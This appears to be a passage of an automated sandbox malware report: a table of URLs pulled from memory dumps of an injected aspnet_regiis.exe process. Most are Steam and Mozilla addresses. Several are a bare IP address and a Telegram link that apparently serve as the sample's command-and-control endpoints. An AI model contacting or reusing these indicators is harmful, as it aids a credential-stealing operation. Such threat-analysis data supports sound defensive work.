                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzolaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2aaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://s.ytimg.com;aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://steam.tv/aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://49.12.197.9/-end-point:faspnet_regiis.exe, 00000003.00000003.2650340672.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://49.12.197.9/5aspnet_regiis.exe, 00000003.00000003.2650340672.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://49.12.197.9HIEBAKaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://49.12.197.9/CAAFHIEBKJaspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://t.me/ae5edfile.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.mozilla.com/en-US/blocklist/aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drfalseunknown
                                                              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://mozilla.org0/aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552045952.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                              http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiECBGCB.3.drfalse
                                                                		unknown
                                                                https://49.12.197.9/$aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sfile.exefalse
                                                                    		unknown
                                                                    https://sketchfab.comaspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://lv.queniujq.cnaspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEBAFBG.3.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.youtube.com/aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                          		unknown
                                                                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.3.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://steamcommunity.com/$baspnet_regiis.exe, 00000003.00000002.3373275406.0000000002EDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtEBAFBG.3.drfalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://www.google.com/recaptcha/aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://checkout.steampowered.com/aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaaspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drfalse
                                                                                    		unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://store.steampowered.com/;aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://store.steampowered.com/about/76561199780418869[1].htm.3.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                      		unknown
                                                                                      https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://ocsp.sectigo.com0file.exefalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://help.steampowered.com/en/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://steamcommunity.com/market/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                          		unknown
